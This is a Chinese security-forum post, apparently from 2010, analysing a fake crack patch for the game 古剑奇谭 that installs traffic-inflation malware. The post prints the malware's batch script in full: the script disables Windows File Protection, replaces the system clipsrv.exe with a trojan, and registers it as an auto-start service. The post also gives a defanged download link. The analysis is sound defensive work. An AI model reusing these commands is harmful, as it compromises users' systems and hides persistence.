下载《古剑奇谭》破解补丁 当心变肉鸡

幻色清风

防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀) V0 T$ F$ v" L1 N5 ^- e- x
    最近对于“仙剑迷”来说又有了一个好消息，由原《仙剑奇侠传》的仙剑之父张毅君带领原班人马历时近三年开发的大型3D游戏《古剑奇谭》跟玩家正式见面了，游戏中融合了众多真实的人文地理风貌，将这些带有浓郁古韵和中国味的风物呈现在玩家的眼前，相信又是一款让人倾心的力作。
7 f3 q+ x& h4 B9 d

2010-7-26 14:10

( [( u: S4 Y8 d: [( O0 G$ ^

图（1）

! @( D% f' C' G) u, D6 X5 Z    但是由于《古剑奇谭》是单机版的，需要CDKEY来激活，所以现在就有一些非法者利用玩家寻求CDKEY的迫切心理，利用假冒的CDKEY来引诱大家下载，从而达到自己刷流量、散布恶意广告等非法目的，同时也给玩家的计算机安全带来了隐患。巨盾安全论坛9 n5 x( q! g5 T
    目前巨盾安全实验室已经成功截取到这一样本，现在拿来简单分析一下，希望广大游戏玩家在寻求CDKEY的时候能够提高警惕。防盗号用巨盾% k* I, y4 M) Y; o; [! @
    首先，我们在该网站：hxxp://hi.baidu.com/leeqiand/blog/item/50d14f9bedc325b8c8eaf488.html（为了用户安全，已将http替换为hxxp），下载到这样一个假冒的CDKEY一份。下载回来之后咋一看是一个应用程序，但是如果你电脑上安装了Winrar之类的解压工具，先右击看一下，你就会发现刚刚下载的文件是一个压缩包了，如图（2）所示：
7 ?7 Q+ e3 w, ~* q! T7 ^; [

2010-7-26 14:10

0 x+ R8 c. L/ E9 |4 r# {5 Q& B1 {  U; {9 Ubbs.ggsafe.com

图（2）

bbs.ggsafe.com' A/ m: `! |# v% H/ O) I1 L
    确定是压缩包之后，我们就不急于打开了，因为现在很多恶意的外挂都是这种压缩包形式的，里面可以暗藏很多命令，比如修改主页，运行压缩包中某个程序等等。接下来我们就用Winrar来打开这个文件，暗藏的命令就会显露无遗了。如图（3）所示：
/ v2 ]$ A$ u  p防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀

2010-7-26 14:10

防盗号用巨盾2 `, N8 A; E0 m) @# D( {" m

图（3）

4 J# [# T9 b) H5 B- nbbs.ggsafe.com    根据图（3）中内容，我们会看到双击该压缩包之后会自动执行360.bat，360.bat的内容如下：
/ s# j9 v  O1 P6 |巨盾安全论坛

1. wfp.exe
   
2. del clipsrv.exe /f /q
   
3. copy clipsrv1.exe clipsrv.exe /y
   
4. sc create ClipSrv binpath= c:\windows\system32\clipsrv.exe
   
5. sc description ClipSrv "启用“剪贴簿查看器”储存信息并与远程计算机共享。如果此服务终止，“剪贴簿查看器” 将无法与远程计算机共享信息。如果此服务被禁用，任何依赖它的服务将无法启动。"
   
6. sc config   ClipSrv start= AUTO
   
7. ping 127.0.0.1 -n 300
   
8. c:\windows\system32\vvisit.exe

复制代码

7 I4 Y0 k+ j9 U0 Y9 Z防盗号用巨盾    该批处理文件接下来将会执行wfp.exe（关闭Windows文件保护功能），然后删除系统目录下的clipsrv.exe(微软Windows操作系统剪切板相关程序剪切、拷贝和粘贴 ),将clipsrv1.exe替换成clipsrv.exe,配制服务实现开机自启动。bbs.ggsafe.com, {9 H3 s( @. `+ E  O. S4 |7 X
    然后会在后台利用“沙丁鱼网站流量系统”刷流量，如图（4）所示。假冒破解补丁中config.ini存放着加密后的登陆名和密码，当browser文件夹下存在hide.txt时，该流量系统将会以隐藏方式运行，使用户无法觉察，当文件夹下没有hide.txt时，该流量系统就会显示出来，有兴趣的玩家可以试一下。
. A& y* E' n; o

2010-7-26 14:10

% D+ O8 L* {; e! a: R/ u, n防盗号用巨盾

图（4）

bbs.ggsafe.com# `. ^/ w5 a5 ]
最后，该非法者通过与“沙丁鱼网站”进行积分兑换，从而达到获取利益的目的。如图（5）所示：
3 p7 R. ~. |$ u& l* k$ _防盗号用巨盾

2010-7-26 14:10

巨盾安全论坛/ h7 C4 Y$ o; R- _

图（5）

bbs.ggsafe.com. O! l5 i; J0 D' I& T* Q# X' n
    通过以上的流程，相信大家对这种刷流量，并进行获取利益的操作有了一定的了解，希望广大玩家引以为戒，共建一个安全、洁净的网络环境。防盗号用巨盾, y$ Q% C& _- s/ S
    最后我们来看一下这个刷流量者的一些信息吧，在网络上寻找蛛丝马迹还是很容易的，希望大家不要哪天被人这样人肉了，螳螂捕蝉黄雀在后啊，哈哈。
" B/ ?- s+ \/ f( V2 p  w! ^  G防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀

2010-7-26 14:10

巨盾安全论坛7 h1 j! |& A( j$ S1 G

. l% z: U4 F2 x7 ^bbs.ggsafe.com    巨盾安全专家提醒广大玩家，不要轻信网络上的这种“免费午餐”，多支持国产单机游戏。如果有玩家怀疑自己已经中招，可以到巨盾安全论坛寻求帮助：bbs.ggsafe.combbs.ggsafe.com* \# x3 G* j2 f/ e4 ^; [0 B

$ J1 a9 c$ r& W( o防盗号用巨盾

zhengrongsuiyue

顶！

巨盾

《古剑奇谭》挺棒，做单机不容易